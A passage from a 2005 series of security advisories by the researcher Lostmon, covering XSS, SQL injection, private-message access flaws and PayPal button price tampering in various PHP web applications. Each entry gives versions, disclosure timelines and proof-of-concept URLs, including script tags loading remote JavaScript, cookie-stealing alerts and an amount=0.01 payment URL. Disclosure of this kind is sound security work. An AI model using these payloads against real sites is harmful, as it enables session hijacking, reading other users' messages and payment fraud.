http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]

http://[victim]/linklists/suggestions.csv
// direct request disclose ip of client who
have suggest a link.

#############
versions
#############

Jax LinkLists v1.1
Jax LinkLists v1.0


#################
6- Jax Calendar
#################

Cross-Site Scripting:

http://[victim]/calendar/jax_calendar.php?Y=2005
[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd0
9437c00badaf419eb0db5&cal_id=0&language=spanish&
gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-
%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-
+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld


http://[victim]/calendar/jax_calendar.php?Y=2005&m=8
[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00ba
daf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=
d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18
%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im
+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419e
b0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnet
ischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_d
ate=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld


http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_t
itle=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagne
tischen+Feld


http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2
&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_
id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.
2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karls
ruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Fe
ld[XSS-CODE]



http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&
cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE]

// all variables affected by XSS flaws

http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE]

// all variables affected by XSS flaws

http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2
&cal_id=0&language=german&gmt_ofs=-1&view=d30

// all variables afected by XSS flaws



##############
versions
##############
Jax Calendar 1.34
Jax Calendar 1.33


#################
7- Jax DWT Editor
#################

Cross-Site Scripting:

http://[victim]/dwt_editor/dwt_editor.php?language=english
[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor


http://[victim]/dwt_editor/dwt_editor.php?language=english
&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor


http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=
%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=
german&area=textbereich2[XSS-CODE]


##############
versions
##############

Jax DWT Editor v1.0


###################
8- Timeline
###################

discovered:27-07-2005
Vendor notify:04-08-2005
vendor response:04-08-2005
disclosure:05-08-2005

#################### €nd #############################

Thnx to estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

@Mail multiple variable cross-site scripting

Thursday, July 28, 2005
#############################################
@Mail multiple variable cross-site scripting
vendor url:http://www.atmail.com
Advisory:http://lostmon.blogspot.com/2005/07/
mail-multiple-variable-cross-site.html
vendor notify:yes exploit available: yes
OSVDB ID:18337,18338,18339,18340
Secunia: SA16252
BID: 14408
##############################################


@Mail is a feature rich Email solution that allows users to access
email-resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s)


@Mail contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

#############
versions
#############

@Mail 4.03 WebMail for Windows
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /

it is also posible other versions are vulnerable.

#################
solution
#################

Apply patch for version 4.11.
http://calacode.com/patch.pl

#################
Timeline
#################

Discovered:02-07-2005
vendor notify:27-07-2005
vendor response:28-07-2005
disclosure:28-07-2005


##################
Proof of comcepts
##################

For exploit this flaws, need a client login and for exploiting
all flaws in /webadmin/ need a admin login.

###################
princal.pl
###################

http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4

http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]

http://[victim]/printcal.pl?type=4[XSS-CODE]

###################
task.pl
###################

http://[victim]/task.pl?func=todo[XSS-CODE]

###################
compose.pl
####################

http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.
[victim].com%3A2%2C&folder=Sent&cache=&func=reply
&type=reply[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r

http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=&Bcc=[XSS-CODE]


http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=[XSS-CODE]&Bcc=

http://[victim]/compose.pl?func=new&To=
lala@lala.es[XSS-CODE]&Cc=&Bcc=

###################
webadmin/filter.pl
###################

http://[victim]/webadmin/filter.pl?func=
viewmailrelay&Order=IPaddress[XSS-CODE]

http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from&Type=1[XSS-CODE]&View=1

http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from[XSS-CODE]&Type=1&View=1

http://[victim]/webadmin/filter.pl?
func=filter&Header=whitelist_from&Type=0&Display=1
&Sort=value[XSS-CODE]&Type=1&View=1



######################## €nd ##########################

Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Clever Copy Unauthorized read & delete Private Messages

Wednesday, July 27, 2005
################################################
Clever Copy Unauthorized read & delete Private Messages
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-unauthorized-read-delete.html
vendor notify: yes exploit available:yes
OSVDB ID: 18509
Secunia : SA16236
BID:14397
################################################


Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System

Clever Copy contains a flaw that allows a Unauthorized read & delete Private Messages from other users.

The flaw is done wen a authenticated user try to access directly to a
especial url to gain unauthorized access to private messages.

############
versions
############

Clever Copy 2.0
Clever Copy 2.0a

###############
Solution
###############

No solution at this time !!

###################
Timeline
###################

Discovered: 25-07-2005
Vendor notify:26-07-2005
Disclosure:27-07-2005

###################
proof of concept
###################

First we must be logged for have access to private messages
and go to this url:

http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=read&ID=2&user=waltrapass

and we look the message 2 from waltrapass user :)

op= read or del
id= id from message what we like to look
name= username of user was send the private message
( this is not necessary to view or delete a message)
user= username from user what we try to look their PM

for delete a message we can go to similar url:

http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=del&ID=2&user=waltrapass

##################### €nd #############################

thnxs to estrella to be my ligth
thnxs to http://www.osvdb.org/

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Multiple Cross site scripting in BMForum

################################################
Multiple Cross site scripting in BMForum
vendor url:http://www.bmforum.com/
Advisore:http://lostmon.blogspot.com/2005/07/
multiple-cross-site-scripting-in.html
Vendor notify:yes Exploit available:yes
OSVDB ID:18306,18307,18308,18309,18310,18311,18312,18313,18314
Secunia: SA16224
BID: 14396
################################################


BMForum contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.



####################
VERSIONS
####################

BMForum Datium! 3.0 RC4
BMForum Datium! 3.0 RC3
BMForum Datium! 3.0 RC2
BMForum Datium! 3.0 RC1
BMForum Plus! 3.0 RC4
BMForum Plus! 3.0 RC3
BMForum Plus! 3.0 RC2
BMForum Plus! 3.0 RC1
BMForum Plus!MX 3.0.0.5
BMForum Plus! 2.6.1


###################
Solution:
###################

No solution at this time.

###################
Timeline:
###################

Discovered: 21-07-2005
vendor notify:25-07-2005
Disclosure:27-07-2005

###################
Proof of XSS
####################

####################
topic.php
####################

http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496&page=2[XSS-CODE]
http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496[XSS-CODE]&page=2
http://[VICTIM]/topic.php?filename=1923[XSS-CODE]

#################
forums.php
#################

http://[VICTIM]/bmb/forums.php?forumid=6[XSS-CODE]
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime[XSS-CODE]&jinhua=&page=
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=[XSS-CODE]&page=
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=&page=[XSS-CODE]


###################
post.php
###################

http://[VICTIM]/post.php?forumid=2\[XSS-CODE]

###################
announcesys.php
###################

http://[VICTIM]/announcesys.php?forumid=0[XSS-CODE]

#################
Others
#################

http://[VICTIM]/datafile/regipbans.php //ips baned.
http://[VICTIM]/bmb/datafile/sendmail.php // full path disclosure.
http://[VICTIM]/post_global.php //full path disclosure
http://[VICTIM]/bmb/datafile/bbslog2.txt //data disclosure
http://[VICTIM]/bmb/bbslog.txt // data disclosure

################### €nd ######################

thnx to estrella to be my ligth.

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

CMSimple 'search' variable XSS

Thursday, July 21, 2005
##############################################
CMSimple 'search' variable XSS
Vendor urL:http://www.cmsimple.dk/
Advisory:http://lostmon.blogspot.com/2005/07/
cmsimple-search-variable-xss.html
vendor fix:http://www.cmsimple.dk/
forum/viewtopic.php?t=2470
Vendor confirmed:YES exploit available:yes
OSVDB ID: 18128
Secunia: SA16147
BID: 14346
Securitytracker: 1014556
##############################################



CMSimple is a simple content management system; for the smart
maintenance of small commercial or private sites.
It is simple - small - smart!


CMSimple contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'search' variable upon submission to 'index.php' script.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

Index.php file contains only a include to cmsimple/cms.php file.


#############
VERSIONS
#############

CMSimple 2.4 and earlier versions


#############
Solution
#############

vendor fix:
http://www.cmsimple.dk/forum/viewtopic.php?t=2470

Fix:

function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.$search;

should be replaced with:

function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.htmlspecialchars(stripslashes($search));

Will be fixed in next beta.

#############
Timeline
#############

discovered: 13-07-2005
vendor notify:20-07-2005
vendor response:21-07-2005
vendor fix:21-07-2005
disclosure:21-07-2005


################
Proof of concept
################

http://[victim]/index.php?&print&function=search&search="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>



http://[victim]/?function=search&search=[XSS-CODE]

http://[victim]/?&print&function=search&search=[XSS-CODE]

http://[victim]/?License&function=search&search=[XSS-CODE]

http://[victim]/?Resellers&function=search&search=[XSS-CODE]

http://[victim]/?&guestbook&function=search&search=[XSS-CODE]


###################### €nd #########################

Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Clever copy Path disclosure and XSS

Monday, July 18, 2005
################################################
Clever copy Path disclosure and XSS
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-path-disclosure-and-xss.html
vendor notify: yes exploit available:yes
OSVDB ID: 18349,18350,18351,18352,18353,18354,18355,
18356,18357,18358,18359,18360,18361
Secunia: SA16236
BID:14395
################################################

Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System

Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'searchtype' and 'searchterm' variables upon submission to
'results.php' and 'categorysearch.php' scripts.This could allow a user
to create a specially crafted URL that would execute arbitrary code in
a user's browser within the trust relationship between the browser and
the server, leading to a loss of integrity

##############
VERSIONS
##############

Clever Copy version 2.0a
Clever Copy version 2.0

##############
SOLUTION
##############

No solution at this time

##############
TIMELINE
##############

Discovered: 15-07-2005
Vendor notify: 18-07-2005
Vendor response: 18-07-2005
Disclosure: 19-07-2005

##############
EXPLOITS
##############

http://[VICTIM]/results.php?searchtype="><script src="
http://www.drorshalev.com/dev/injection/js.js"></script>
category&searchterm=Announcements

http://[VICTIM]/results.php?searchtype=category&searchterm=">
<scriptsrc="http://www.drorshalev.com/dev/injection/js.js&
quot;></script>Announcements


http://[VICTIM]/results.php?start=0&searchtype="><script
src="http://www.drorshalev.com/dev/injection/js.js"><
/script>category&searchterm=Announcements

http://[VICTIM]/results.php?start=0&searchtypecategory&searchterm=
Announcements="><script src="http://www.drorshalev
.com/dev/injection/js.js"></script>

http://[VICTIM]/categorysearch.php?star=0&searchtype="><
script src="http://www.drorshalev.com/dev/injection/js.js
"></script>category&searchterm=Announcements

http://[VICTIM]/categorysearch.php?star=0&searchtypecategory&
searchterm=Announcements"><script src="http://
www.drorshalev.com/dev/injection/js.js"></script>

################################
direct request path disclosure:
################################

http://[VICTIM]/ticker.php
http://[VICTIM]/menu.php
http://[VICTIM]/banned.php
http://[VICTIM]/endlayout.php
http://[VICTIM]/randomhlinesblock.php
http://[VICTIM]/showlast.php
http://[VICTIM]/showlast5class1.php
http://[VICTIM]/showlast5phorum.php
http://[VICTIM]/showlast5phorumblock.php
http://[VICTIM]/showlastforumbb2.php
http://[VICTIM]/showlastforumbb2block.php


######################## €nd #############################

Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Clever copy 'calendar.php' 'yr' variable cross site scripting

Friday, July 15, 2005
################################################
Clever copy 'calendar.php' 'yr' variable cross site scripting
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-calendarphp-yr-variable.html
vendor notify: yes exploit available:yes
OSVDB ID:17919
Securitytracker: 1014492
BID: 14278
################################################

Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System

Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate 'yr'
variable upon submission to 'calendar.php' script.This could allow a
user to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity

##############
VERSIONS
##############

Clever Copy version 2.0a
Clever Copy version 2.0

##############
SOLUTION
##############

No solution at this time

##############
TIMELINE
##############

Discovered: 12-07-2005
Vendor notify: 13-07-2005
Vendor response:14-07-2005
Disclosure: 15-07-2005

##############
EXPLOIT
##############

http://[victim]/calendar.php?mth=3&yr=2006"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>

######################## €nd #############################

Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente...

class-1 Forum Software Cross site scripting

Thursday, July 14, 2005
#########################################################
class-1 Forum Software Cross site scripting.
Original advisore:http://lostmon.blogspot.com/2005/07/
class-1-forum-software-cross-site.html
Vendor url:http://www.class1web.co.uk/download_forum.php
Vendor notify: yes exploit available: yes
OSVDB ID:17920,17921,17922,17923
Secunia: SA16078
BID: 14261
Securitytracker: 1014485 1014486
##########################################################


class-1 Forum Software is a PHP/MySQL driven web forum

class-1 Forum contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate 'viewuser_id' and 'group' variables upon
submission to 'users.php' script.This could allow a user to create
a specially crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser and
the server,leading to a loss of integrity

##################
versions
##################

class-1 Forum Software (v 0.23.2) vulnerable.
class-1 Forum Software (v 0.24.4) vulnerable.

it is posible that other versions are vulnerables too.

Clever Copy (http://clevercopy.bestdirectbuy.com/)
with forums module afected instaled.

Clever Copy 2.0
Clever Copy 2.0a

###################
Solution
###################

no solution at this time.

################
Timeline
################

discovered: 10-07-2005
vendor notify: 12-07-2005 (Webform)
vendor response:
2 vendor response:12-07-2005 (Clever Copy)
disclosure: 14-07-2005


##############################
proof of Cross site Scripting
##############################

http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=89[XSS-code]

http://[victim]/forum/users.php?mode=viewgroup&group=Moderators[XSS-code]


#########################
posible SQL injections
#########################

http://www.class1web.co.uk/forum/viewattach.php?id=[SQL-Injection]

SQL Error
There was an error executing the query - SELECT * FROM attachments
WHERE attach_id='''
You have an error in your SQL syntax near ''''' at line 1

-------

http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=[SQL-Injection]

There was an error executing the query - SELECT * FROM users
WHERE user_id='''
You have an error in your SQL syntax near ''''' at line 1

--------

http://[victim]/forum/viewforum.php?mode=view&id=[SQL-Injection]

There was an error executing the query - SELECT * FROM messages
WHERE id='''
You have an error in your SQL syntax near ''''' at line 1

---------

http://[victim]/forum/viewforum.php?forum=[SQL-Injection]

There was an error executing the query - SELECT * FROM group_permissions
WHERE forum_id=''' AND forum_hidden='1' AND group_name='Standard Users'
You have an error in your SQL syntax near '1' AND group_name='Standard Users'' at line 1

----------
#################### €nd ###########################

Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

ATutor multiple variable Cross site scripting

Wednesday, June 15, 2005
################################################
ATutor multiple variable Cross site scripting
vendor url:http://www.atutor.ca/atutor/download.php
ADVISORE:http://lostmon.blogspot.com/2005/06/
atutor-multiple-variable-cross-site.html
VENDOR NOTIFY: YES EXPLOIT AVAILABLE: YES
OSVDB ID:17351,17352,17353,17354,17355
17356,17357,17358,17359.
Secunia: SA15705
Securitytracker: 1014216
BID: 13972
################################################

ATutor is an Open Source Web-based Learning Content
Management System (LCMS) designed with accessibility
and adaptability in mind.

ATutor contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate multiple variables upon submission
to multiple scripts. script.This could allow a user to
create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.


###########
versions:
###########

ATutor 1.4.3 vulnerable
ATutor 1.5 RC 1 vulnerable
ATutor 1.5 RC 2 vulnerable
Atutor 1.5 RC 3 not tested

#############
solution
#############

Upgrade to version ATutor 1.5RC3 or higher, as it has been
reported to fix this vulnerability. An upgrade is required
as there are no known workarounds.


##############
timeline
##############

discovered: 10-06-2005
vendor notify: 14-06-2005 (webform)
vendor response: 27-06-2005
disclosure: 16-06-2005


##################
Proof of concepts
##################

http://[VICTIM]/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]

http://[VICTIM]/ATutor/contact.php?subject=[XSS-CODE]

http://[VICTIM]/atutor/content.php?cid=323[XSS-CODE]

http://[VICTIM]/atutor/inbox/send_message.php?l=1[XSS-CODE]

http://[VICTIM]/atutor/search.php?search=10[XSS-CODE]
&words=kk&include=all&find_in=this&display_as=pages
&search=Search

http://[VICTIM]/ATutor/search.php?search=1&words=aa[XSS-CODE]
&include=one&find_in=all&display_as=summaries&search=Search
#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one[XSS-CODE]&find_in=all&display_as=
summaries&search=Search#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all[XSS-CODE]&display_as=
summaries&search=Search#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=[XSS-CODE]
summaries&search=Search#search_results

http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=summaries&search
=[XSS-CODE]Search#search_results

http://[VICTIM]/ATutor/inbox/index.php?view=1[XSS-CODE]

http://[VICTIM]/ATutor/tile.php?query=yy
&field=technicalFormat&submit=Search[XSS-CODE]

http://[VICTIM]/ATutor/tile.php?query=[XSS-CODE]
&field=technicalFormat&submit=Search

http://[VICTIM]/ATutor/tile.php?query=yy&
field=technicalFormat[XSS-CODE]&submit=Search

http://[VICTIM]/ATutor/forum/subscribe_forum.php?
fid=2&us=1[XSS-CODE]

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=[XSS-CODE]
1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5
B%5D=[XSS-CODE]2&roles%5B%5D=3&status=1&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]

http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&status=
2&reset_filter=Reset+Filter[XSS-CODE]

http://[VICTIM]/ATutor/directory.php?roles[]=1[XSS-CODE]

for exploting some flaws , need a client login.
Others scripts and others variables are vulnerable
to the same style attack.


############### €nd ##############

Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

PayPal arbitrary price manipulation

Monday, May 30, 2005
##############################################
PayPal 'butons' price manipulation.
vendor url:https://www.paypal.com/
http://lostmon.blogspot.com/2005/05/
paypal-arbitrary-price-manipulation.html
vendor notify: yes exploit available: yes
Discovered by FalconDeOro(1) and Lostmon(2)
##############################################

PayPal buttons are prone to price manipulation.
all stores based on PayPal buttons are posible
vulnerables to this flaw.


##########################
code example of a button
##########################
the proof is based on this form:

https://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside

in the exmple of explotation we used "PayPal price manipulation kit " program to shop.
This is Non existent product...

the link of the button for shopping have this url:
(1)
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=19.90&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15


this is the normal price for the product (19.90$) but...
if we change 'amount' variable to 0.01 the product now cost 0.01$

https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=0.01&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15

another way to exploiting this situation:

(2)
this other example coming from a stored based on paypal:

https://www.paypal.com/cart/add=1&business=[EMAIL-Bussines]
&item_name=PayPal+price+manipulation+ kit&item_number=
7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0
&shipping2=0&handling=0&rm=2&custom=1¤cy_code=USD

if we look we can change not only the price , we can change the email account
name of product, and other details.
for shopping you need an account on PayPal.

#############
timeline:
#############

discovered: 14 may 2005
vendor notify: 25 may 2005
Vendor response: 26 may 2005
disclosure: 27 may 2005
Public disclosure: 30 may 2005


################### End ####################

thnx to estrella to be my ligth
thnx to icaro he is my support
Thnx to FalconDeOro ... patience.
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!

contact to FalconDeOro
(falcondeoro@gmail.com)
http://falcondeoro.blogspot.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Quick Cart Search field cross site scripting and script insercion

Sunday, May 29, 2005
#####################################################
Quick Cart Search field cross site scripting and script insercion
vendor url:http://www.quickcart.com/
advisore:http://lostmon.blogspot.com/2005/05/
quick-cart-search-field-cross-site.html
vendor notify: yes exploit available: yes
Securitytracker:1014076
#####################################################

Quick Cart contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the
application does not validate the 'search' field upon
submission to 'search.cfm' script.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.


############
versions
############

free edition affected:
https://www.quickcart.com/qc_checkout.cfm


but is posible other versions ( standar or others) are afected


################
solution
################

no solution was available at this time

#############
Timeline
#############

discovered: 10 may 2005
vendor notify: 27 may 2005
vendor response: 27 may 2005
disclosure: 29 may 2005

##############
exploit
##############

put in the search box of the store:

//"><script>alert(document.cookie)</script>

or

//"><SCRIPT src="http://www.drorshalev.com/dev/injection/js.js"></script>

and the script is executing , this is a XSS flaw
and a posible script insercion


#################### €nd ###################

Thnx to http://www.drorshalev.com for this script
and for hosting it for this demostration.

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

BookReview 1.0 multiple variable XSS

Wednesday, May 25, 2005
###################################################
BookReview 1.0 multiple variable XSS
vendor url:http://www.readersunite.com
advisore:http://lostmon.blogspot.com/2005/05/
bookreview-10-multiple-variable-xss.html
vendor notify: yes exploit available: yes
OSVDB ID:16871,16872,16873,16874,16875,16876,16877
16878,16879,16880,16881
BID:13783
Securitytracker: 1014058
###################################################

BookReview contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the
application does not validate multiple variables upon
submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.

############
versions:
############

BookReview beta 1.0 vulnerable.

##############
solution
##############

no solutions was available at this time

###########
timeline
###########

discovered: 27 april 2005
vendor notify 17 may 2005 (webform)
disclosure: 26 may 2005

##################
proof of concepts
###################

all files are submited to 'index.php' script by variable 'page' like
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]
the name of module can be 'add_review' 'add_contents' or others

for example this url:
http://[victim]/index.php?page=add_contents
&isbn=083081423X&chapters=25

is the same of this :

http://[victim]/add_contents.htm?isbn=083081423X&chapters=25

whith this if you think we have two wais for exploiting this situation,
one whith the index.php and other directly by the module.

##################
add_review.htm
#################

http://[victim]/add_review.htm?isbn=0801052319&node=
%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true

http://[victim]/add_review.htm?isbn=0801052319
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script
%3E&node=Political_Science&review=true

http://[victim]/add_review.htm?isbn=0553278223&node=
"><script>alert(document.cookie)</script>&review=true

http://[victim]/add_review.htm?node=index&isbn=\"><script>alert(document.cookie)</script>

###################
index.php
###################

